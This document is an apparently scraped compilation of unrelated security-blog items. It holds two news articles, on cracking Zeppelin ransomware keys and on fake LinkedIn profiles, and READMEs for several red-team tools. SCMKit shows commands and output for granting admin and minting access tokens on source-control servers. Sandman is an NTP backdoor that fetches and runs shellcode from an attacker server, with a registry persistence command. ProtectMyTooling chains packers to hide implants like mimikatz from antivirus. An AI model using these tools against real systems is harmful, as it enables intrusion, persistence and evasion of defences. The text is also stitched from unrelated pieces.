• Return all the activities, services and broadcast receivers which are exported and have null permission set. This is decided on the basis of two things:

  • android:exporte=true is present in any of the component and have no permission set.
  • If exported is not mention then slicer check if any Intent-filters are defined for that component, if yes that means that component is exported by default(This is the rule given in android documentation.)

• Check the Firebase URL of the APK by testing it for .json trick.

  • If the firebase URL is myapp.firebaseio.com then it will check if https://myapp.firebaseio.com/.json returns something or gives permission denied.
  • If this thing is open then that can be reported as high severity.

• Check if the google API keys are publically accessible or not.

  • This can be reported on some bounty programs but have a low severity.
  • But most of the time reporting this kind of thing will bring out the pain of Duplicate.
  • Also sometimes the company can just close it as not applicable and will claim that the KEY has a usage cap - r/suspiciouslyspecific
    

• Return other API keys that are present in strings.xml and in AndroidManifest.xml

• List all the file names present in /res/raw and res/xml directory.

• Extracts all the URLs and paths.

  • These can be used with tool like dirsearch or ffuf.

Installation

• Clone this repository

git clone https://github.com/mzfr/slicer

• cd slicer
• Now you can run it: python3 slicer.py -h

Usage

It's very simple to use. Following options are available:

Extract information from Manifest and strings of an APK

Usage:
        slicer [OPTION] [Extracted APK directory]

Options:

  -d, --dir             path to jadx output directory
  -o, --output          Name of the output file(not implemented)

I have not implemented the output flag yet because I think if you can redirect slicer output to a yaml file it will a proper format.

Usage Example

• Extract information from the APK and display it on the screen.

python3 slicer.py -d path/to/extact/apk -c config.json

Acknowledgements and Credits

The extractor module used to extract URLs and paths is taken from apkurlgrep by @ndelphit

Contribution

All the features implemented in this are things that I've learned in past few weeks, so if you think that there are various other things which should be checked in an APK then please open an issue for that feature and I'd be happy to implement that :)

Support

If you'd like you can buy me some coffee:

Researchers Quietly Cracked Zeppelin Ransomware Keys

Peter is an IT manager for a technology manufacturer that got hit with a Russian ransomware strain called “Zeppelin” in May 2020. He’d been on the job less than six months, and because of the way his predecessor architected things, the company’s data backups also were encrypted by Zeppelin. After two weeks of stalling their extortionists, Peter’s bosses were ready to capitulate and pay the ransom demand. Then came the unlikely call from an FBI agent. “Don’t pay,” the agent said. “We’ve found someone who can crack the encryption.”

Peter, who spoke candidly about the attack on condition of anonymity, said the FBI told him to contact a cybersecurity consulting firm in New Jersey called Unit 221B, and specifically its founder — Lance James. Zeppelin sprang onto the crimeware scene in December 2019, but it wasn’t long before James discovered multiple vulnerabilities in the malware’s encryption routines that allowed him to brute-force the decryption keys in a matter of hours, using nearly 100 cloud computer servers.

In an interview with KrebsOnSecurity, James said Unit 221B was wary of advertising its ability to crack Zeppelin ransomware keys because it didn’t want to tip its hand to Zeppelin’s creators, who were likely to modify their file encryption approach if they detected it was somehow being bypassed.

This is not an idle concern. There are multiple examples of ransomware groups doing just that after security researchers crowed about finding vulnerabilities in their ransomware code.

“The minute you announce you’ve got a decryptor for some ransomware, they change up the code,” James said.

But he said the Zeppelin group appears to have stopped spreading their ransomware code gradually over the past year, possibly because Unit 221B’s referrals from the FBI let them quietly help nearly two dozen victim organizations recover without paying their extortionists.

In a blog post published today to coincide with a Black Hat talk on their discoveries, James and co-author Joel Lathrop said they were motivated to crack Zeppelin after the ransomware gang started attacking nonprofit and charity organizations.

“What motivated us the most during the leadup to our action was the targeting of homeless shelters, nonprofits and charity organizations,” the two wrote. “These senseless acts of targeting those who are unable to respond are the motivation for this research, analysis, tools, and blog post. A general Unit 221B rule of thumb around our offices is: Don’t [REDACTED] with the homeless or sick! It will simply trigger our ADHD and we will get into that hyper-focus mode that is good if you’re a good guy, but not so great if you are an ***hole.”

The researchers said their break came when they understood that while Zeppelin used three different types of encryption keys to encrypt files, they could undo the whole scheme by factoring or computing just one of them: An ephemeral RSA-512 public key that is randomly generated on each machine it infects.

“If we can recover the RSA-512 Public Key from the registry, we can crack it and get the 256-bit AES Key that encrypts the files!” they wrote. “The challenge was that they delete the [public key] once the files are fully encrypted. Memory analysis gave us about a 5-minute window after files were encrypted to retrieve this public key.”

Unit 221B ultimately built a “Live CD” version of Linux that victims could run on infected systems to extract that RSA-512 key. From there, they would load the keys into a cluster of 800 CPUs donated by hosting giant Digital Ocean that would then start cracking them. The company also used that same donated infrastructure to help victims decrypt their data using the recovered keys.

A typical Zeppelin ransomware note.

Jon is another grateful Zeppelin ransomware victim who was aided by Unit 221B’s decryption efforts. Like Peter, Jon asked that his last name and that of his employer be omitted from the story, but he’s in charge of IT for a mid-sized managed service provider that got hit with Zeppelin in July 2020.

The attackers that savaged Jon’s company managed to phish credentials and a multi-factor authentication token for some tools the company used to support customers, and in short order they’d seized control over the servers and backups for a healthcare provider customer.

Jon said his company was reluctant to pay a ransom in part because it wasn’t clear from the hackers’ demands whether the ransom amount they demanded would provide a key to unlock all systems, and that it would do so safely.

“They want you to unlock your data with their software, but you can’t trust that,” Jon said. “You want to use your own software or someone else who’s trusted to do it.”

In August 2022, the FBI and the Cybersecurity & Infrastructure Security Agency (CISA) issued a joint warning on Zeppelin, saying the FBI had “observed instances where Zeppelin actors executed their malware multiple times within a victim’s network, resulting in the creation of different IDs or file extensions, for each instance of an attack; this results in the victim needing several unique decryption keys.”

The advisory says Zeppelin has attacked “a range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries. Zeppelin actors have been known to request ransom payments in Bitcoin, with initial amounts ranging from several thousand dollars to over a million dollars.”

The FBI and CISA say the Zeppelin actors gain access to victim networks by exploiting weak Remote Desktop Protocol (RDP) credentials, exploiting SonicWall firewall vulnerabilities, and phishing campaigns. Prior to deploying Zeppelin ransomware, actors spend one to two weeks mapping or enumerating the victim network to identify data enclaves, including cloud storage and network backups, the alert notes.

Jon said he felt so lucky after connecting with James and hearing about their decryption work, that he toyed with the idea of buying a lottery ticket that day.

“This just doesn’t usually happen,” Jon said. “It’s 100 percent like winning the lottery.”

By the time Jon’s company got around to decrypting their data, they were forced by regulators to prove that no patient data had been exfiltrated from their systems. All told, it took his employer two months to fully recover from the attack.

“I definitely feel like I was ill-prepared for this attack,” Jon said. “One of the things I’ve learned from this is the importance of forming your core team and having those people who know what their roles and responsibilities are ahead of time. Also, trying to vet new vendors you’ve never met before and build trust relationships with them is very difficult to do when you have customers down hard now and they’re waiting on you to help them get back up.”

A more technical writeup on Unit 221B’s discoveries (cheekily titled “0XDEAD ZEPPELIN”) is available here.

What is an External Penetration Test?

SCMKit - Source Code Management Attack Toolkit

Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community.

Installation/Building

Libraries Used

The below 3rd party libraries are used in this project.

Pre-Compiled

• Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires a .NET library that can be installed from the NuGet package manager.

• Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
• Go to "NuGet Package Manager" --> "Package Sources"
• Add a package source with the URL https://api.nuget.org/v3/index.json
• Install the below NuGet packages
  • Install-Package Costura.Fody -Version 3.3.3
  • Install-Package Octokit
  • Install-Package GitLabApiClient
  • Install-Package Newtonsoft.Json
• You can now build the project yourself!

Usage

Arguments/Options

• -c, -credential - credential for authentication (username:password or apiKey)
• -s, -system - system to attack (github,gitlab,bitbucket)
• -u, -url - URL for GitHub Enterprise, GitLab Enterprise or Bitbucket Server
• -m, -module - module to run
• -o, -option - options (when applicable)

Systems (-s, -system)

• github: GitHub Enterprise
• gitlab: GitLab Enterprise
• bitbucket: Bitbucket Server

Modules (-m, -module)

• listrepo: list all repos the current user can see
• searchrepo: search for a given repo
• searchcode: search for code containing keyword search term
• searchfile: search for filename containing keyword search term
• listsnippet: list all snippets of current user
• listrunner: list all GitLab runners available to current user
• listgist: list all gists of current user
• listorg: list all orgs current user belongs to
• privs: get privs of current API token
• addadmin: promote given user to admin role
• removeadmin: demote given user from admin role
• createpat: create personal access token for target user
• listpat: list personal access tokens for a target user
• removepat: remove personal access token for a target user
• createsshkey: create SSH key for current user
• listsshkey: list SSH keys for current user
• removesshkey: remove SSH key for current user
• adminstats: get admin stats (users, repos, orgs, gists)
• protection: get branch protection settings

Module Details Table

The below table shows where each module is supported

Examples

List Repos

Use Case

Discover repositories being used in a particular SCM system

Syntax

Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

GitHub Enterprise

This will list all repositories that a user can see.

SCMKit.exe -s github -m listrepo -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listrepo -c apiKey -u https://github.something.local

GitLab Enterprise

This will list all repositories that a user can see.

SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local

SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local

Bitbucket Server

This will list all repositories that a user can see.

SCMKit.exe -s bitbucket -m listrepo -c userName:password -u https://bitbucket.something.local

SCMKit.exe -s bitbucket -m listrepo -c apiKey -u https://bitbucket.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listrepo -c username:password -u https://gitlab.hogwarts.local

==================================================
Module:         listrepo
System:         gitlab
Auth Type:      Username/Password
Options:
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/14/2022 8:30:47 PM
==================================================

                                    Name | Visibility |                                                URL
----------------------------------------------------------------------------------------------------------
                            MaraudersMap |    Private | https://gitlab.hogwarts.local/hpotter/maraudersmap
                            testingStuff |   Internal | https://gitlab.hogwarts.local/adumbledore/testingstuff
                               Spellbook |   Internal |    https://gitlab.hogwarts.local/hpotter/spellbook       findShortestPathToGryffindorSword |   Internal | https://gitlab.hogwarts.local/hpotter/findShortestPathToGryffindorSword
                                  charms |     Public |      https://gitlab.hogwarts.local/hgranger/charms
                           Secret-Spells |   Internal | https://gitlab.hogwarts.local/adumbledore/secret-spells
                              Monitoring |   Internal | https://gitlab.hogwarts.local/gitlab-instance-10590c85/Monitoring

Search Repos

Use Case

Search for repositories by repository name in a particular SCM system

Syntax

Provide the searchrepo module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the matching repository name and URL.

GitHub Enterprise

The GitHub repo search is a "contains" search where the string you enter it will search for repos with names that contain your search term.

SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term"

SCMKit.exe -s github -m searchrepo -c apikey -u https://github.something.local -o "some search term"

GitLab Enterprise

The GitLab repo search is a "contains" search where the string you enter it will search for repos with names that contain your search term.

SCMKit.exe -s gitlab -m searchrepo -c userName:password -u https://gitlab.something.local -o "some search term"

SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"

Bitbucket Server

The Bitbucket repo search is a "starts with" search where the string you enter it will search for repos with names that start with your search term.

SCMKit.exe -s bitbucket -m searchrepo -c userName:password -u https://bitbucket.something.local -o "some search term"

SCMKit.exe -s bitbucket -m searchrepo -c apikey -u https://bitbucket.something.local -o "some search term"

Example Output

C:\source\SCMKit\SCMKit\bin\Release>SCMKit.exe -s bitbucket -m searchfile -c apikey -u http://bitbucket.hogwarts.local:7990 -o jenkinsfile

==================================================
Module:         searchfile
System:         bitbucket
Auth Type:      API Key
Options:        jenkinsfile
Target URL:     http://bitbucket.hogwarts.local:7990

Timestamp:      1/14/2022 10:17:59 PM
==================================================


[>] REPO: http://bitbucket.hogwarts.local:7990/scm/~HPOTTER/hpotter
    [>] FILE: Jenkinsfile

[>] REPO: http://bitbucket.hogwarts.local:7990/scm/STUD/cred-decryption
    [>] FILE: subDir/Jenkinsfile

Total matching results: 2

C:\>SCMKit.exe -s gitlab -m listsnippet -c username:password -u https://gitlab.hogwarts.local

==================================================
Module:         listsnippet
System:         gitlab
Auth Type:      Username/Password
Options:
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/14/2022 9:17:36 PM
==================================================

               Title |                                                                Raw URL
---------------------------------------------------------------------------------------------
        spell-script |                         https://gitlab.hogwarts.local/-/snippets/2/raw

C:\>SCMKit.exe -s gitlab -m listrunner -c username:password -u https://gitlab.hogwarts.local

==================================================
Module:         listrunner
System:         gitlab
Auth Type:      Username/Password
Options:
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/25/2022 11:40:08 AM
==================================================

   ID |                 Name |                                      Repo Assigned
---------------------------------------------------------------------------------
    2 |        gitlab-runner | https://gitlab.hogwarts.local/hpotter/spellbook.git
    3 |        gitlab-runner | https://gitlab.hogwarts.local/hpotter/maraudersmap.git

C:\>SCMKit.exe -s github -m listgist -c username:password -u https://github-enterprise.hogwarts.local

==================================================
Module:         listgist
System:         github
Auth Type:      Username/Password
Options:
Target URL:     https://github-enterprise.hogwarts.local

Timestamp:      1/14/2022 9:43:23 PM
==================================================

                             Description | Visibility |                                                URL
----------------------------------------------------------------------------------------------------------
            Shell Script to Decode Spell |     public | https://github-enterprise.hogwarts.local/gist/c11c6bb3f47fe67183d5bc9f048412a1

C:\>SCMKit.exe -s github -m listorg -c username:password -u https://github-enterprise.hogwarts.local

==================================================
Module:         listorg
System:         github
Auth Type:      Username/Password
Options:
Target URL:     https://github-enterprise.hogwarts.local

Timestamp:      1/14/2022 9:44:48 PM
==================================================

                          Name |                                                URL
-----------------------------------------------------------------------------------
                      Hogwarts | https://github-enterprise.hogwarts.local/api/v3/orgs/Hogwarts/repos

C:\>SCMKit.exe -s gitlab -m privs -c apikey -u https://gitlab.hogwarts.local

==================================================
Module:         privs
System:         gitlab
Auth Type:      API Key
Options:
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/14/2022 9:18:27 PM
==================================================

          Token Name |    Active? |            Privilege |                                                            Description
---------------------------------------------------------------------------------------------------------------------------------
  hgranger-api-token |       True |                  api | Read-write for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
  hgranger-api-token |       True |            read_user | Read-only for endpoints under /users. Essentially, access to any of the GET    requests in the Users API.
  hgranger-api-token |       True |             read_api | Read-only for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
  hgranger-api-token |       True |      read_repository |                      Read-only (pull) for the repository through git clone.
  hgranger-api-token |       True |     write_repository | Read-write (pull, push) for the repository through git clone. Required for accessing Git repositories over HTTP when 2FA is enabled.

C:\>SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.hogwarts.local -o hgranger

==================================================
Module:         addadmin
System:         gitlab
Auth Type:      API Key
Options:        hgranger
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/14/2022 9:19:32 PM
==================================================


[+] SUCCESS: The hgranger user was successfully added to the admin role.

C:\>SCMKit.exe -s gitlab -m removeadmin -c username:password -u https://gitlab.hogwarts.local -o hgranger

==================================================
Module:         removeadmin
System:         gitlab
Auth Type:      Username/Password
Options:        hgranger
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/14/2022 9:20:12 PM
==================================================


[+] SUCCESS: The hgranger user was successfully removed from the admin role.

C:\>SCMKit.exe -s gitlab -m createpat -c username:password -u https://gitlab.hogwarts.local -o hgranger

==================================================
Module:         createpat
System:         gitlab
Auth Type:      Username/Password
Options:        hgranger
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/20/2022 1:51:23 PM
==================================================

   ID |         Name |                          Token
-----------------------------------------------------
   59 | SCMKIT-AaCND |           R3ySx_8HUn6UQ_6onETx

[+] SUCCESS: The hgranger user personal access token was successfully added.

C:\>SCMKit.exe -s gitlab -m listpat -c username:password -u https://gitlab.hogwarts.local -o hgranger

==================================================
Module:         listpat
System:         gitlab
Auth Type:      Username/Password
Options:        hgranger
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/20/2022 1:54:41 PM
==================================================

   ID |                 Name |    Active? |                                             Scopes
----------------------------------------------------------------------------------------------
   59 |         SCMKIT-AaCND |       True |             api, read_repository, write_repository

C:\>SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.hogwarts.local -o 58

==================================================
Module:         removepat
System:         gitlab
Auth Type:      API Key
Options:        59
Target URL:     https://gitlab.hogwarts.local

Timestamp:      1/20/2022 1:56:47 PM
==================================================



[*] INFO: Revoking personal access token of ID: 59


[+] SUCCESS: The personal access token of ID 59 was successfully revoked.

C:\>SCMKit.exe -s gitlab -m listsshkey -u http://gitlab.hogwarts.local -c apiToken

==================================================
Module:         listsshkey
System:         gitlab
Auth Type:      API Key
Options:
Target URL:     https://gitlab.hogwarts.local

Timestamp:      2/7/2022 4:09:40 PM
==================================================

  SSH Key ID |             SSH Key Value |                Title
---------------------------------------------------------------
           9 | .....p50edigBAF4lipVZkAM= |         SCMKIT-RLzie
          10 | .....vGJLPGHiTwIxW9i+xAs= |         SCMKIT-muFGU

C:\>SCMKit.exe -s bitbucket -m removesshkey -u http://bitbucket.hogwarts.local:7990 -c username:password -o 16

==================================================
Module:         removesshkey
System:         bitbucket
Auth Type:      Username/Password
Options:        16
Target URL:     http://bitbucket.hogwarts.local:7990

Timestamp:      2/7/2022 1:48:03 PM
==================================================


[+] SUCCESS: The SSH key of ID 16 was successfully revoked.

C:\>SCMKit.exe -s github -m adminstats -c username:password -u https://github-enterprise.hogwarts.local

==================================================
Module:         adminstats
System:         github
Auth Type:      Username/Password
Options:
Target URL:     https://github-enterprise.hogwarts.local

Timestamp:      1/14/2022 9:45:50 PM
==================================================

     Admin Users |  Suspended Users |      Total Users
------------------------------------------------------
               1 |                0 |                5


     Total Repos |      Total Wikis
-----------------------------------
               4 |                0


      Total Orgs |   Total Team Members |      Total Teams
----------------------------------------------------------
               1 |                    0 |                0


   Private Gis   ts |     Public Gists
-----------------------------------
               0 |                1

C:\>.\SCMKit.exe -u http://github.hogwarts.local -s github -c apiToken -m protection -o public-r

==================================================
Module:         protection
System:         github
Auth Type:      API Key
Options:        public-r
Target URL:     http://github.hogwarts.local

Timestamp:      8/29/2022 2:02:42 PM
==================================================

                     Repo |                    Branch |                                         Protection
----------------------------------------------------------------------------------------------------------
              public-repo |                       dev | Protected: True
                                                        Status checks must pass before merge:
                                                          Branch must be up-to-date before merge: True
                                                           Owner review required before merge: True
                                                        Approvals required before merge: 2
                                                        Protections apply to repo admins: True
              public-repo |                      main | Protected: False

LinkedIn Adds Verified Emails, Profile Creation Dates

Responding to a recent surge in AI-generated bot accounts, LinkedIn is rolling out new features that it hopes will help users make more informed decisions about with whom they choose to connect. Many LinkedIn profiles now display a creation date, and the company is expanding its domain validation offering, which allows users to publicly confirm that they can reply to emails at the domain of their stated current employer.

LinkedIn’s new “About This Profile” section — which is visible by clicking the “More” button at the top of a profile — includes the year the account was created, the last time the profile information was updated, and an indication of how and whether an account has been verified.

LinkedIn also said it is adding a warning to some LinkedIn messages that include high-risk content, or that try to entice the user into taking the conversation to another platform (like WeChat).

“We may warn you about messages that ask you to take the conversation to another platform because that can be a sign of a scam,” the company said in a blog post. “These warnings will also give you the choice to report the content without letting the sender know.”

In late September 2022, KrebsOnSecurity warned about the proliferation of fake LinkedIn profiles for Chief Information Security Officer (CISO) roles at some of the world’s largest corporations. A follow-up story on Oct. 5 showed how the phony profile problem has affected virtually all executive roles at corporations, and how these fake profiles are creating an identity crisis for the businesses networking site and the companies that rely on it to hire and screen prospective employees.

Reporting here last month also tracked a massive drop in profiles claiming to work at several major technology companies, as LinkedIn apparently took action against hundreds of thousands of inauthentic accounts that falsely claimed roles at these companies.

For example, on October 10, 2022, there were 576,562 LinkedIn accounts that listed their current employer as Apple Inc. The next day, half of those profiles no longer existed. At around the same time, the number of LinkedIn profiles claiming current roles at Amazon fell from roughly 1.25 million to 838,601 in just one day, a 33 percent drop.

For whatever reason, the majority of the phony LinkedIn profiles reviewed by this author were young women with profile photos that appear to have been generated by artificial intelligence (AI) tools.

“We’re seeing rapid advances in AI-based synthetic image generation technology and we’ve created a deep learning model to better catch profiles made with this technology,” LinkedIn’s Oscar Rodriguez wrote. “AI-based image generators can create an unlimited number of unique, high-quality profile photos that do not correspond to real people.”

It remains unclear who or what is behind the recent proliferation of fake executive profiles on LinkedIn, but likely they are from a combination of scams. Cybersecurity firm Mandiant (recently acquired by Google) told Bloomberg that hackers working for the North Korean government have been copying resumes and profiles from leading job listing platforms LinkedIn and Indeed, as part of an elaborate scheme to land jobs at cryptocurrency firms.

Identity thieves have been known to masquerade on LinkedIn as job recruiters, collecting personal and financial information from people who fall for employment scams.

Also, fake profiles also may be tied to so-called “pig butchering” scams, wherein people are lured by flirtatious strangers online into investing in cryptocurrency trading platforms that eventually seize any funds when victims try to cash out.

Tips for Choosing a Pentesting Company

Sandman - NTP Based Backdoor For Red Team Engagements In Hardened Networks

Sandman is a backdoor that is meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.

Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.

Usage

SandmanServer (Usage)

Run on windows / *nix machine:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"

• Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).

• Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.

• IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).

SandmanBackdoor (Usage)

To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.

SandmanBackdoorTimeProvider (Usage)

To use it, you will need to follow simple steps:

• Add the following registry value:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"

• Restart the w32time service:

sc stop w32time
sc start w32time

NOTE: Make sure you are compiling with the x64 option and not any CPU option!

Capabilities

• Getting and executing an arbitrary payload from an attacker's controlled server.

• Can work on hardened networks since NTP is usually allowed in FW.

• Impersonating a legitimate NTP server via IP spoofing.

Setup

SandmanServer (Setup)

• Python 3.9

• The requirements are specified in the requirements file.

SandmanBackdoor (Setup)

To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.

SandmanBackdoorTimeProvider (Setup)

To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.

IOCs

• A shellcode is injected into RuntimeBroker.

• Suspicious NTP communication starts with a known magic header.

• YARA rule.

Contributes

• Orca for the shellcode.

• Special thanks to Tim McGuffin for the time provider idea.

Thanks to those who already contributed and I'll happily accept contributions, make a pull request and I will review it!

British Hacker Charged for Operating "The Real Deal" Dark Web Marketplace

ProtectMyTooling - Multi-Packer Wrapper Letting Us Daisy-Chain Various Packers, Obfuscators And Other Red Team Oriented Weaponry

Script that wraps around multitude of packers, protectors, obfuscators, shellcode loaders, encoders, generators to produce complex protected Red Team implants. Your perfect companion in Malware Development CI/CD pipeline, helping watermark your artifacts, collect IOCs, backdoor and more.

ProtectMyToolingGUI.py

With ProtectMyTooling you can quickly obfuscate your binaries without having to worry about clicking through all the Dialogs, interfaces, menus, creating projects to obfuscate a single binary, clicking through all the options available and wasting time about all that nonsense. It takes you straight to the point - to obfuscate your tool.

Aim is to offer the most convenient interface possible and allow to leverage a daisy-chain of multiple packers combined on a single binary.

That's right - we can launch ProtectMyTooling with several packers at once:

C:\> py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

The above example will firstly pass mimikatz.exe to the Hyperion for obfuscation, and then the result will be provided to UPX for compression. Resulting with UPX(Hyperion(file))

Features

• Supports multiple different PE Packers, .NET Obfuscators, Shellcode Loaders/Builders
• Allows daisy-chaining packers where output from a packer is passed to the consecutive one: callobf,hyperion,upx will produce artifact UPX(Hyperion(CallObf(file)))
• Collects IOCs at every obfuscation step so that auditing & Blue Team requests can be satisfied
• Offers functionality to inject custom Watermarks to resulting PE artifacts - in DOS Stub, Checksum, as a standalone PE Section, to file's Overlay
• Comes up with a handy Cobalt Strike aggressor script bringing protected-upload and protected-execute-assembly commands
• Straightforward command line usage

Installation

This tool was designed to work on Windows, as most packers natively target that platform.

Some features may work however on Linux just fine, nonetheless that support is not fully tested, please report bugs and issues.

1. First, disable your AV and add contrib directory to exclusions. That directory contains obfuscators, protectors which will get flagged by AV and removed.
2. Then clone this repository

PS C:\> git clone --recurse https://github.com/Binary-Offensive/ProtectMyTooling

3. Actual installation is straightforward:

Windows

PS C:\ProtectMyTooling> .\install.ps1

Linux

bash# ./install.sh

Gimmicks

For ScareCrow packer to run on Windows 10, there needs to be WSL installed and bash.exe available (in %PATH%). Then, in WSL one needs to have golang installed in version at least 1.16:

cmd> bash
bash$ sudo apt update ; sudo apt upgrade -y ; sudo apt install golang=2:1.18~3 -y

Configuration

To plug-in supported obfuscators, change default options or point ProtectMyTooling to your obfuscator executable path, you will need to adjust config\ProtectMyTooling.yaml configuration file.

There is also config\sample-full-config.yaml file containing all the available options for all the supported packers, serving as reference point.

Friendly reminder

• If your produced binary crashes or doesn't run as expected - try using different packers chain.
• Packers don't guarantee stability of produced binaries, therefore ProtectMyTooling cannot as well.
• While chaining, carefully match output->input payload formats according to what consecutive packer expects.

Usage

Before ProtectMyTooling's first use, it is essential to adjust program's YAML configuration file ProtectMyTooling.yaml. The order of parameters processal is following:

• Firstly default parameters are used
• Then they're overwritten by values coming from YAML
• Finally, whatever is provided in command line will overwrite corresponding values

There, supported packer paths and options shall be set to enable.

Scenario 1: Simple ConfuserEx obfuscation

Usage is very simple, all it takes is to pass the name of obfuscator to choose, input and output file paths:

C:\> py ProtectMyTooling.py confuserex Rubeus.exe Rubeus-obf.exe

    ::::::::::.:::::::..      ...  :::::::::::.,::::::  .,-::::::::::::::::
     `;;;```.;;;;;;``;;;;  .;;;;;;;;;;;;;;;\''';;;;\'\''',;;;'````;;;;;;;;\'\'''
      `]]nnn]]' [[[,/[[[' ,[[     \[[,  [[     [[cccc [[[           [[
       $$$""    $$$$$$c   $$$,     $$$  $$     $$"""" $$$           $$
       888o     888b "88bo"888,_ _,88P  88,    888oo,_`88bo,__,o,   88,
    .  YMMMb :.-:.MM   ::-. "YMMMMMP"   MMM    """"YUMMM"YUMMMMMP"  MMM
    ;;,.    ;;;';;.   ;;;;'
    [[[[, ,[[[[, '[[,[[['
    $$$$$$$$"$$$   c$$"
    888 Y88" 888o,8P"`
    ::::::::::::mM...        ...     :::    :::::.    :::. .,-:::::/
    ;;;;;;;;\'''.;;;;;;;.  .;;;;;;;.  ;;;    ;;`;;;;,  `;;,;;-'````'
         [[   ,[[     \[[,[[     \[[,[[[    [[[ [[[[[. '[[[[   [[[[[[/
         $$   $$$,     $$$$$,     $$$$$'    $$$ $$$ "Y$c$"$$c.    "$$
         88,  "888,_ _,88"   888,_ _,88o88oo,._888 888    Y88`Y8bo,,,o88o
         MMM    "YMMMMMP"  "YMMMMMP"""""YUMMMMM MMM     YM  `'YMUP"YMM

    Red Team implants protection swiss knife.

    Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
    Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
    v0.15

[.] Processing x86 file: "\Rubeus.exe"
[.] Generating output of ConfuserEx(<file>)...

[+] SUCCEEDED. Original file size: 417280 bytes, new file size ConfuserEx(<file>): 756224, ratio: 181.23%

Scenario 2: Simple ConfuserEx obfuscation followed by artifact test

One can also obfuscate the file and immediately attempt to launch it (also with supplied optional parameters) to ensure it runs fine with options -r --cmdline CMDLINE:

PS> py .\ProtectMyTooling.py callobf,upx,hyperion beacon.exe beacon-obf.exe -i -I operation_chimera -w dos-stub=fooobar -w checksum=0xaabbccdd

    [...]

[.] Processing x64 file: "beacon.exe"
[>] Generating output of CallObf(<file>)...

[.] Before obfuscation file's PE IMPHASH:       17b461a082950fc6332228572138b80c
[.] After obfuscation file's PE IMPHASH:        378d9692fe91eb54206e98c224a25f43
[>] Generating output of UPX(CallObf(<file>))...

[>] Generating output of Hyperion(UPX(CallObf(<file>)))...

[+] Setting PE checksum to 2864434397 (0xaabbccdd)
[+] Successfully watermarked resulting artifact file.
[+] IOCs written to: beacon-obf-ioc.csv

[+] SUCCEEDED. Original file size: 288256 bytes, new file size Hyperion(UPX(CallObf(<file>))): 175616, ratio: 60.92%

timestamp,filename,author,context,comment,md5,sha1,sha256,imphash
2022-06-10 03:15:52,beacon.exe,mgeeky@commandoVM,Input File,test,dcd6e13754ee753928744e27e98abd16,298de19d4a987d87ac83f5d2d78338121ddb3cb7,0a64768c46831d98c5667d26dc731408a5871accefd38806b2709c66cd9d21e4,17b461a082950fc6332228572138b80c
2022-06-10 03:15:52,y49981l3.bin,mgeeky@commandoVM,Obfuscation artifact: CallObf(<file>),test,50bbce4c3cc928e274ba15bff0795a8c,15bde0d7fbba1841f7433510fa9aa829f8441aeb,e216cd8205f13a5e3c5320ba7fb88a3dbb6f53ee8490aa8b4e1baf2c6684d27b,378d9692fe91eb54206e98c224a25f43
2022-06-10 03:15:53,nyu2rbyx.bin,mgeeky@commandoVM,Obfuscation artifact: UPX(CallObf(<file>)),test,4d3584f10084cded5c6da7a63d42f758,e4966576bdb67e389ab1562e24079ba9bd565d32,97ba4b17c9bd9c12c06c7ac2dc17428d509b64fc8ca9e88ee2de02c36532be10,9aebf3da4677af9275c461261e5abde3
